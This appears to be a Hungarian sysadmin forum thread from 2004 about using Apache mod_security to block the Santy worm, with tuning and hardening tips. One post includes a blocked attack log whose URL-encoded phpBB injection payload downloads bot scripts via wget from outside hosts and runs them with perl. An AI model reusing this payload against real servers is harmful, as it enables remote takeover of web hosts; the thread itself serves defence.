- A hozzászóláshoz be kell jelentkezni
Hozzászólások
Na ugy latszik en nem akadtam fenn ha ez elment ;)
Reggen en mar neztem egyszer, de akkor "szemmel lathatoan" visszafogta a teljesitmenyet a webservernek ... trey, mik a mostani tapasztalataid, nem jelent jelentosebb overheadet a hasznalata
(sebesseben es/vagy pl memoriahasznalatban)?
- A hozzászóláshoz be kell jelentkezni
Allitolag 10% korul van sebessegben ha a
SecFilterEngine On
beallitas van. Hasznalhatsz helyette
SecFilterEngine DinamicOnly
SecAuditEngine RelevantOnly
beallitast is. A debugot nyilvan ki kell kapcsolni, mert a diszk IO (log iras) a leglassabb. Amugy nem vettem eszre nagy valtozast. Memoriaban semmit, CPU-ban sem latszik semmi kiugro.
Erdemes elolvasni a szerzo cikket az OnLamp-on itt.
- A hozzászóláshoz be kell jelentkezni
Ja a Santy.A, Santy.B, stb. probalkozasokat szepen megfogja. Ez viszi el a legtobbet jelenleg + a referer spammelok.
Percenkent 20-30 van beloluk.
=======================================
UNIQUE_ID: PmcIEcCoAgQAAApNKfkAAAAR
Request: 81.*.*.* - - [28/Dec/2004:17:07:03 +0100] "GET /modules.php?name=Forums&rush=%65%63%68%6F%20%
5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;
cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20
http://www.abcft.org/themes/bot.htm;wget%20http://http://
weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20
ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%
68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%
61%73%73%74%68%72%75%28%24%48%54%54%50%
5F%47%45%54%5F%56%41%52%53%5B%72%75%73%
68%5D%29.%2527'; HTTP/1.1" 403 1024
Handler: (null)
----------------------------------------
GET /modules.php?name=Forums&rush=%65%63%68%6F%20%
5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;
cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20
http://www.abcft.org/themes/bot.htm;wget%20http://
http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm
%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%
63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%
70%61%73%73%74%68%72%75%28%24%48%54%54%
50%5F%47%45%54%5F%56%41%52%53%5B%72%75%
73%68%5D%29.%2527'; HTTP/1.1
Connection: close
Host: www.hup.hu
User-Agent: LWP::Simple/5.69
mod_security-message: Access denied with code 403. Pattern match "%27" at CUSTOM
mod_security-action: 403
HTTP/1.1 403 Forbidden
Last-Modified: Sun, 26 Dec 2004 13:49:42 GMT
ETag: "50840-400-177ac980"
Accept-Ranges: bytes
Content-Length: 1024
Connection: close
Content-Type: text/html; charset=ISO-8859-2
- A hozzászóláshoz be kell jelentkezni
Van mit tanulni trey mestertől... :) A fenébe is, miért nem ilyen dolgokkal foglalkozom munkaidőben, miért nem kerülök én is közel az ilyen tűzhöz... Na mindegy, bocs, csak tesztelek :)
- A hozzászóláshoz be kell jelentkezni
Sajnos enis csak almodozom. De nem adom fel!
Tanulni, tanulni, tanulni! (Lenin)
(Csak az iskola ne lenne budos 8) )
- A hozzászóláshoz be kell jelentkezni
Vagy a lábad :) Bocs, de ezt 403-as tesztre küldtem :)
- A hozzászóláshoz be kell jelentkezni
Trey!
Az apache ide vontakozo beallitasokat megosztod velunk (gyk: reszlet copy-paste ;-)
Kosz,
Elbandi
- A hozzászóláshoz be kell jelentkezni
ROTFL :D
- A hozzászóláshoz be kell jelentkezni
Szerintem ha tanulni akarsz és ÉRTENI amit csinálsz, akkor magad kísérletezed ki. Nem egy túlbonyolított dolog. Ha nem próbálkozol és kísérletezel, akkor nem rendszergazda leszel, hanem betanított rendszerfelügyeleti segédmunkás. Nem RTFM, hanem jótanács.
- A hozzászóláshoz be kell jelentkezni
ezen en is gondolkodtam, hogy kerjem-e vagy sem... de most modemmel vagyok es ejjel 2 korul nincs kedvem/idom szetturni a netet hogy megtanuljam a mod_security-t.
Masik meg, hogy egy mukodo peldabol konnyebb tanulni, minthogy valamit osszeganyolok, es azon izgulok, hogy nem b*tam el semmit, es nem k*rjak fel a forumom...
- A hozzászóláshoz be kell jelentkezni
Trey irj egy privatot lenne paar dolog amit tudnek javasolni...
De csak ha erdekel... tudok segiteni ez ugyben...
- A hozzászóláshoz be kell jelentkezni
A Santy ellen az alap configon kivul ennyi kell neked:
http://www.modsecurity.org/blog/archives/000046.html
Tokeletesen mukodik. Ami meg hasznos:
noexec mountolod a /tmp-t, chmod 550 a wget-re, szurod a lwp trivial, LWP::Simple HTTP_USER_AGENT-eket, sot en lehet h tovabbmegyek, es megkovetelem az HTTP_USER_AGENT megletet. Ez utobbival az a baj, hogy nehany newsfeed reader nem kuld semmit, igy azok kimaradnak a jatekbol.
A tobbi, szemelyreszolo beallitast neked kell kikiserletezni, mert en nem tudhatom, hogy kit-mit akarsz meg szurni. Ez olyan mint a spam. En szurom a referer spammeloket is...
Ja es ha a PHP verziod 4.3.10 es a phpBB-det mar joelore megpatchelted ( javitas itt [www.phpbb.com]), akkor tulajdonkeppen ezek mar csak plusz biztositekok, mert a worm ugysem arthat.
- A hozzászóláshoz be kell jelentkezni
> mert a worm ugysem arthat.
A worm nem, de ettol meg mas igen. Szoval ezt hasznalva se lehet nyugodtan hatradolni, mert neked egy lepessel mindig a tamadok elott kell jarni, ami nem konnyu. Sigh.
- A hozzászóláshoz be kell jelentkezni
Hehe trey, ha tényleg csak 3 false positive volt, az mind3 én voltam... pedig csak egy sima url volt a hozzászólásomban. Még akartam is írni levelet emiatt, de aztán láttam, másoknak megy a post, gondoltam biztos vmi pillanatnyi elmezavar, és nem akartalak zavarni... :)
- A hozzászóláshoz be kell jelentkezni
chmod 550 a wget-re
;)))
és a /usr/bin/ftp ? :P
- A hozzászóláshoz be kell jelentkezni
a Santy wget-et hasznal, de igazabol barmire celszeru. :-)
- A hozzászóláshoz be kell jelentkezni
Sot azon gondolkodom, hogy akar a perl-re is. Ha nem hasznalja user a gepen akar le is lehet tepni :-). Problem solved. Persze csak olyan rendszeren, ahol a perl-lel egyutt nem jon le meg a boot record is :-D, mint fuggoseg.
- A hozzászóláshoz be kell jelentkezni